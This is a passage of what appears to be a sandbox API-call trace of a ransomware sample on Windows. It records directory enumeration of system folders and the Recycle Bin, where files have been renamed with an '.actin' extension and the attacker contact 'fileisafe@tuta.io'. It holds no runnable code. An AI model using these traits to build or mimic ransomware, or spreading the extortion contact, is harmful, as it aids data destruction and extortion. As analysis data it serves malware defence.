ftLastWriteTime.dwLowDateTime=0x7c7d2e4e, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x142, dwReserved0=0x0, dwReserved1=0x0, cFileName="PartnerSetupCompleteResult.log.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="PARTNE~1.ACT")) returned 1 [0140.026] GetLastError () returned 0x0 [0140.026] SetLastError (dwErrCode=0x0) [0140.026] GetLastError () returned 0x0 [0140.026] SetLastError (dwErrCode=0x0) [0140.026] GetLastError () returned 0x0 [0140.026] SetLastError (dwErrCode=0x0) [0140.026] GetLastError () returned 0x0 [0140.026] SetLastError (dwErrCode=0x0) [0140.026] GetLastError () returned 0x0 [0140.026] SetLastError (dwErrCode=0x0) [0140.026] GetLastError () returned 0x0 [0140.026] SetLastError (dwErrCode=0x0) [0140.026] GetLastError () returned 0x0 [0140.026] SetLastError (dwErrCode=0x0) [0140.026] GetLastError () returned 0x0 [0140.026] SetLastError (dwErrCode=0x0) [0140.026] GetLastError () returned 0x0 [0140.027] SetLastError (dwErrCode=0x0) [0140.027] GetLastError () returned 0x0 [0140.027] SetLastError (dwErrCode=0x0) [0140.027] GetLastError () returned 0x0 [0140.027] SetLastError (dwErrCode=0x0) [0140.027] GetLastError () returned 0x0 [0140.027] SetLastError (dwErrCode=0x0) [0140.027] GetLastError () returned 0x0 [0140.027] SetLastError (dwErrCode=0x0) [0140.027] GetLastError () returned 0x0 [0140.027] SetLastError (dwErrCode=0x0) [0140.027] GetLastError () returned 0x0 [0140.027] SetLastError (dwErrCode=0x0) [0140.027] GetLastError () returned 0x0 [0140.027] SetLastError (dwErrCode=0x0) [0140.027] GetLastError () returned 0x0 [0140.027] SetLastError (dwErrCode=0x0) [0140.027] GetLastError () returned 0x0 [0140.027] SetLastError (dwErrCode=0x0) [0140.027] GetLastError () returned 0x0 [0140.027] SetLastError (dwErrCode=0x0) [0140.027] GetLastError () returned 0x0 [0140.027] SetLastError (dwErrCode=0x0) [0140.027] GetLastError () returned 0x0 [0140.027] SetLastError (dwErrCode=0x0) [0140.027] GetLastError () returned 0x0 [0140.028] SetLastError (dwErrCode=0x0) [0140.028] GetLastError () returned 0x0 [0140.028] SetLastError (dwErrCode=0x0) [0140.028] GetLastError () returned 0x0 [0140.028] SetLastError (dwErrCode=0x0) [0140.028] GetLastError () returned 0x0 [0140.028] SetLastError (dwErrCode=0x0) [0140.028] GetLastError () returned 0x0 [0140.028] SetLastError (dwErrCode=0x0) [0140.028] GetLastError () returned 0x0 [0140.028] SetLastError (dwErrCode=0x0) [0140.028] GetLastError () returned 0x0 [0140.028] SetLastError (dwErrCode=0x0) [0140.028] GetLastError () returned 0x0 [0140.028] SetLastError (dwErrCode=0x0) [0140.028] GetLastError () returned 0x0 [0140.028] SetLastError (dwErrCode=0x0) [0140.028] GetLastError () returned 0x0 [0140.028] SetLastError (dwErrCode=0x0) [0140.028] GetLastError () returned 0x0 [0140.028] SetLastError (dwErrCode=0x0) [0140.028] GetLastError () returned 0x0 [0140.028] SetLastError (dwErrCode=0x0) [0140.028] GetLastError () returned 0x0 [0140.029] SetLastError (dwErrCode=0x0) [0140.029] GetLastError () returned 0x0 [0140.029] SetLastError (dwErrCode=0x0) [0140.029] GetLastError () returned 0x0 [0140.029] SetLastError (dwErrCode=0x0) [0140.029] GetLastError () returned 0x0 [0140.029] SetLastError (dwErrCode=0x0) [0140.029] GetLastError () returned 0x0 [0140.029] SetLastError (dwErrCode=0x0) [0140.029] GetLastError () returned 0x0 [0140.029] SetLastError (dwErrCode=0x0) [0140.029] GetLastError () returned 0x0 [0140.029] SetLastError (dwErrCode=0x0) [0140.029] GetLastError () returned 0x0 [0140.029] SetLastError (dwErrCode=0x0) [0140.029] GetLastError () returned 0x0 [0140.029] SetLastError (dwErrCode=0x0) [0140.029] GetLastError () returned 0x0 [0140.029] SetLastError (dwErrCode=0x0) [0140.029] GetLastError () returned 0x0 [0140.029] SetLastError (dwErrCode=0x0) [0140.029] GetLastError () returned 0x0 [0140.029] SetLastError (dwErrCode=0x0) [0140.029] GetLastError () returned 0x0 [0140.030] SetLastError (dwErrCode=0x0) [0140.030] GetLastError () returned 0x0 [0140.030] SetLastError (dwErrCode=0x0) [0140.030] GetLastError () returned 0x0 [0140.030] SetLastError (dwErrCode=0x0) [0140.030] FindNextFileW (in: hFindFile=0xaa91d0, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c6a1810, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c6a1810, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c7d2e4e, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x142, dwReserved0=0x0, dwReserved1=0x0, cFileName="PartnerSetupCompleteResult.log.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="PARTNE~1.ACT")) returned 0 [0140.030] FindClose (in: hFindFile=0xaa91d0 | out: hFindFile=0xaa91d0) returned 1 [0140.030] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x30d0078 | out: hHeap=0x26a0000) returned 1 [0140.030] FindNextFileW (in: hFindFile=0xaa9490, lpFindFileData=0x306f618 | out: lpFindFileData=0x306f618*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="SafeOS", cAlternateFileName="")) returned 1 [0140.031] GetLastError () returned 0x12 [0140.031] SetLastError (dwErrCode=0x12) [0140.031] GetLastError () returned 0x12 [0140.031] SetLastError (dwErrCode=0x12) [0140.031] GetLastError () returned 0x12 [0140.031] SetLastError (dwErrCode=0x12) [0140.031] GetLastError () returned 0x12 [0140.031] SetLastError (dwErrCode=0x12) [0140.031] GetLastError () returned 0x12 [0140.031] SetLastError (dwErrCode=0x12) [0140.031] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10000) returned 0x30d0078 [0140.031] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\*", lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xaa91d0 [0140.032] FindNextFileW (in: hFindFile=0xaa91d0, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.032] FindNextFileW (in: hFindFile=0xaa91d0, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c4654a7, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c4654a7, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c4b1999, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x233d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="GetCurrentOOBE.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="GETCUR~1.ACT")) returned 1 [0140.032] GetLastError () returned 0x12 [0140.032] SetLastError (dwErrCode=0x12) [0140.032] GetLastError () returned 0x12 [0140.032] SetLastError (dwErrCode=0x12) [0140.032] GetLastError () returned 0x12 [0140.032] SetLastError (dwErrCode=0x12) [0140.032] GetLastError () returned 0x12 [0140.032] SetLastError (dwErrCode=0x12) [0140.032] GetLastError () returned 0x12 [0140.032] SetLastError (dwErrCode=0x12) [0140.032] GetLastError () returned 0x12 [0140.032] SetLastError (dwErrCode=0x12) [0140.032] GetLastError () returned 0x12 [0140.032] SetLastError (dwErrCode=0x12) [0140.033] GetLastError () returned 0x12 [0140.033] SetLastError (dwErrCode=0x12) [0140.033] GetLastError () returned 0x12 [0140.033] SetLastError (dwErrCode=0x12) [0140.033] GetLastError () returned 0x12 [0140.033] SetLastError (dwErrCode=0x12) [0140.033] GetLastError () returned 0x12 [0140.033] SetLastError (dwErrCode=0x12) [0140.033] GetLastError () returned 0x12 [0140.033] SetLastError (dwErrCode=0x12) [0140.033] GetLastError () returned 0x12 [0140.033] SetLastError (dwErrCode=0x12) [0140.033] GetLastError () returned 0x12 [0140.033] SetLastError (dwErrCode=0x12) [0140.033] GetLastError () returned 0x12 [0140.033] SetLastError (dwErrCode=0x12) [0140.033] GetLastError () returned 0x12 [0140.033] SetLastError (dwErrCode=0x12) [0140.033] GetLastError () returned 0x12 [0140.033] SetLastError (dwErrCode=0x12) [0140.033] GetLastError () returned 0x12 [0140.033] SetLastError (dwErrCode=0x12) [0140.033] GetLastError () returned 0x12 [0140.033] SetLastError (dwErrCode=0x12) [0140.033] GetLastError () returned 0x12 [0140.034] SetLastError (dwErrCode=0x12) [0140.034] GetLastError () returned 0x12 [0140.034] SetLastError (dwErrCode=0x12) [0140.034] GetLastError () returned 0x12 [0140.034] SetLastError (dwErrCode=0x12) [0140.034] GetLastError () returned 0x12 [0140.034] SetLastError (dwErrCode=0x12) [0140.034] GetLastError () returned 0x12 [0140.034] SetLastError (dwErrCode=0x12) [0140.034] GetLastError () returned 0x12 [0140.034] SetLastError (dwErrCode=0x12) [0140.034] GetLastError () returned 0x12 [0140.034] SetLastError (dwErrCode=0x12) [0140.034] GetLastError () returned 0x12 [0140.034] SetLastError (dwErrCode=0x12) [0140.034] GetLastError () returned 0x12 [0140.034] SetLastError (dwErrCode=0x12) [0140.034] GetLastError () returned 0x12 [0140.034] SetLastError (dwErrCode=0x12) [0140.034] GetLastError () returned 0x12 [0140.034] SetLastError (dwErrCode=0x12) [0140.034] GetLastError () returned 0x12 [0140.034] SetLastError (dwErrCode=0x12) [0140.034] GetLastError () returned 0x12 [0140.035] SetLastError (dwErrCode=0x12) [0140.035] GetLastError () returned 0x12 [0140.035] SetLastError (dwErrCode=0x12) [0140.035] GetLastError () returned 0x12 [0140.035] SetLastError (dwErrCode=0x12) [0140.035] GetLastError () returned 0x12 [0140.035] SetLastError (dwErrCode=0x12) [0140.035] GetLastError () returned 0x12 [0140.035] SetLastError (dwErrCode=0x12) [0140.035] GetLastError () returned 0x12 [0140.035] SetLastError (dwErrCode=0x12) [0140.035] GetLastError () returned 0x12 [0140.035] SetLastError (dwErrCode=0x12) [0140.035] GetLastError () returned 0x12 [0140.035] SetLastError (dwErrCode=0x12) [0140.035] GetLastError () returned 0x12 [0140.035] SetLastError (dwErrCode=0x12) [0140.035] GetLastError () returned 0x12 [0140.035] SetLastError (dwErrCode=0x12) [0140.035] GetLastError () returned 0x12 [0140.035] SetLastError (dwErrCode=0x12) [0140.035] GetLastError () returned 0x12 [0140.035] SetLastError (dwErrCode=0x12) [0140.035] GetLastError () returned 0x12 [0140.035] SetLastError (dwErrCode=0x12) [0140.035] GetLastError () returned 0x12 [0140.036] SetLastError (dwErrCode=0x12) [0140.036] GetLastError () returned 0x12 [0140.036] SetLastError (dwErrCode=0x12) [0140.036] GetLastError () returned 0x12 [0140.036] SetLastError (dwErrCode=0x12) [0140.036] GetLastError () returned 0x12 [0140.036] SetLastError (dwErrCode=0x12) [0140.036] FindNextFileW (in: hFindFile=0xaa91d0, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c73a4a4, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c73a4a4, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c73a4a4, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x1a2, dwReserved0=0x0, dwReserved1=0x0, cFileName="GetCurrentRollback.ini.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="GETCUR~2.ACT")) returned 1 [0140.036] GetLastError () returned 0x12 [0140.036] SetLastError (dwErrCode=0x12) [0140.036] GetLastError () returned 0x12 [0140.036] SetLastError (dwErrCode=0x12) [0140.036] GetLastError () returned 0x12 [0140.036] SetLastError (dwErrCode=0x12) [0140.036] GetLastError () returned 0x12 [0140.036] SetLastError (dwErrCode=0x12) [0140.036] GetLastError () returned 0x12 [0140.036] SetLastError (dwErrCode=0x12) [0140.036] GetLastError () returned 0x12 [0140.036] SetLastError (dwErrCode=0x12) [0140.036] GetLastError () returned 0x12 [0140.036] SetLastError (dwErrCode=0x12) [0140.036] GetLastError () returned 0x12 [0140.037] SetLastError (dwErrCode=0x12) [0140.037] GetLastError () returned 0x12 [0140.037] SetLastError (dwErrCode=0x12) [0140.037] GetLastError () returned 0x12 [0140.037] SetLastError (dwErrCode=0x12) [0140.037] GetLastError () returned 0x12 [0140.037] SetLastError (dwErrCode=0x12) [0140.037] GetLastError () returned 0x12 [0140.037] SetLastError (dwErrCode=0x12) [0140.037] GetLastError () returned 0x12 [0140.037] SetLastError (dwErrCode=0x12) [0140.037] GetLastError () returned 0x12 [0140.037] SetLastError (dwErrCode=0x12) [0140.037] GetLastError () returned 0x12 [0140.037] SetLastError (dwErrCode=0x12) [0140.037] GetLastError () returned 0x12 [0140.037] SetLastError (dwErrCode=0x12) [0140.037] GetLastError () returned 0x12 [0140.037] SetLastError (dwErrCode=0x12) [0140.037] GetLastError () returned 0x12 [0140.037] SetLastError (dwErrCode=0x12) [0140.037] GetLastError () returned 0x12 [0140.037] SetLastError (dwErrCode=0x12) [0140.037] GetLastError () returned 0x12 [0140.038] SetLastError (dwErrCode=0x12) [0140.038] GetLastError () returned 0x12 [0140.038] SetLastError (dwErrCode=0x12) [0140.038] GetLastError () returned 0x12 [0140.038] SetLastError (dwErrCode=0x12) [0140.038] GetLastError () returned 0x12 [0140.038] SetLastError (dwErrCode=0x12) [0140.038] GetLastError () returned 0x12 [0140.038] SetLastError (dwErrCode=0x12) [0140.038] GetLastError () returned 0x12 [0140.038] SetLastError (dwErrCode=0x12) [0140.038] GetLastError () returned 0x12 [0140.038] SetLastError (dwErrCode=0x12) [0140.038] GetLastError () returned 0x12 [0140.038] SetLastError (dwErrCode=0x12) [0140.038] GetLastError () returned 0x12 [0140.038] SetLastError (dwErrCode=0x12) [0140.038] GetLastError () returned 0x12 [0140.038] SetLastError (dwErrCode=0x12) [0140.038] GetLastError () returned 0x12 [0140.038] SetLastError (dwErrCode=0x12) [0140.038] GetLastError () returned 0x12 [0140.038] SetLastError (dwErrCode=0x12) [0140.038] GetLastError () returned 0x12 [0140.038] SetLastError (dwErrCode=0x12) [0140.038] GetLastError () returned 0x12 [0140.039] SetLastError (dwErrCode=0x12) [0140.039] GetLastError () returned 0x12 [0140.039] SetLastError (dwErrCode=0x12) [0140.039] GetLastError () returned 0x12 [0140.039] SetLastError (dwErrCode=0x12) [0140.039] GetLastError () returned 0x12 [0140.039] SetLastError (dwErrCode=0x12) [0140.039] GetLastError () returned 0x12 [0140.039] SetLastError (dwErrCode=0x12) [0140.039] GetLastError () returned 0x12 [0140.039] SetLastError (dwErrCode=0x12) [0140.039] GetLastError () returned 0x12 [0140.039] SetLastError (dwErrCode=0x12) [0140.039] GetLastError () returned 0x12 [0140.039] SetLastError (dwErrCode=0x12) [0140.039] GetLastError () returned 0x12 [0140.039] SetLastError (dwErrCode=0x12) [0140.039] FindNextFileW (in: hFindFile=0xaa91d0, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c73a4a4, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c73a4a4, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c73a4a4, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x362, dwReserved0=0x0, dwReserved1=0x0, cFileName="PartnerSetupComplete.cmd.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="PARTNE~1.ACT")) returned 1 [0140.039] FindNextFileW (in: hFindFile=0xaa91d0, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c760448, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c760448, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c760448, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x142, dwReserved0=0x0, dwReserved1=0x0, cFileName="preoobe.cmd.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="PREOOB~1.ACT")) returned 1 [0140.039] FindNextFileW (in: hFindFile=0xaa91d0, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c760448, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c760448, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c760448, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x242, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupComplete.cmd.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPC~1.ACT")) returned 1 [0140.039] FindNextFileW (in: hFindFile=0xaa91d0, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c760448, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c760448, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c760448, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x242, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupComplete.cmd.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPC~1.ACT")) returned 0 [0140.040] FindClose (in: hFindFile=0xaa91d0 | out: hFindFile=0xaa91d0) returned 1 [0140.040] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x30d0078 | out: hHeap=0x26a0000) returned 1 [0140.040] FindNextFileW (in: hFindFile=0xaa9490, lpFindFileData=0x306f618 | out: lpFindFileData=0x306f618*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="SafeOS", cAlternateFileName="")) returned 0 [0140.040] FindClose (in: hFindFile=0xaa9490 | out: hFindFile=0xaa9490) returned 1 [0140.040] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x30c0070 | out: hHeap=0x26a0000) returned 1 [0140.041] FindNextFileW (in: hFindFile=0xaa9050, lpFindFileData=0x306f89c | out: lpFindFileData=0x306f89c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffff610, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 1 [0140.041] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\*", lpFindFileData=0x306f618 | out: lpFindFileData=0x306f618*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName=".", cAlternateFileName="")) returned 0xaa9490 [0140.042] FindNextFileW (in: hFindFile=0xaa9490, lpFindFileData=0x306f618 | out: lpFindFileData=0x306f618*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="..", cAlternateFileName="")) returned 1 [0140.042] FindNextFileW (in: hFindFile=0xaa9490, lpFindFileData=0x306f618 | out: lpFindFileData=0x306f618*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="S-1-5-18", cAlternateFileName="")) returned 1 [0140.042] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-18\\*", lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xaa91d0 [0140.042] FindNextFileW (in: hFindFile=0xaa91d0, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.042] FindNextFileW (in: hFindFile=0xaa91d0, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c760448, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c760448, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c7acb56, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="DESKTO~1.ACT")) returned 1 [0140.042] FindNextFileW (in: hFindFile=0xaa91d0, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c760448, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c760448, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c7acb56, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="DESKTO~1.ACT")) returned 0 [0140.042] FindClose (in: hFindFile=0xaa91d0 | out: hFindFile=0xaa91d0) returned 1 [0140.042] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x30d0078 | out: hHeap=0x26a0000) returned 1 [0140.042] FindNextFileW (in: hFindFile=0xaa9490, lpFindFileData=0x306f618 | out: lpFindFileData=0x306f618*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x7ac3fed, ftLastAccessTime.dwHighDateTime=0x1d53298, ftLastWriteTime.dwLowDateTime=0x7ac3fed, ftLastWriteTime.dwHighDateTime=0x1d53298, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0140.042] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\*", lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x7ac3fed, ftLastAccessTime.dwHighDateTime=0x1d53298, ftLastWriteTime.dwLowDateTime=0x7ac3fed, ftLastWriteTime.dwHighDateTime=0x1d53298, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xaa93d0 [0140.042] FindNextFileW (in: hFindFile=0xaa93d0, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x7ac3fed, ftLastAccessTime.dwHighDateTime=0x1d53298, ftLastWriteTime.dwLowDateTime=0x7ac3fed, ftLastWriteTime.dwHighDateTime=0x1d53298, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.042] FindNextFileW (in: hFindFile=0xaa93d0, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7ac3fed, ftCreationTime.dwHighDateTime=0x1d53298, ftLastAccessTime.dwLowDateTime=0x7ac3fed, ftLastAccessTime.dwHighDateTime=0x1d53298, ftLastWriteTime.dwLowDateTime=0x7ac3fed, ftLastWriteTime.dwHighDateTime=0x1d53298, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0140.043] FindNextFileW (in: hFindFile=0xaa93d0, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c7d2e4e, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c7d2e4e, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c7d2e4e, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="DESKTO~1.ACT")) returned 1 [0140.043] FindNextFileW (in: hFindFile=0xaa93d0, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c7d2e4e, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c7d2e4e, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c7d2e4e, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.id[B4197730-0115].[fileisafe@tuta.io].actin", 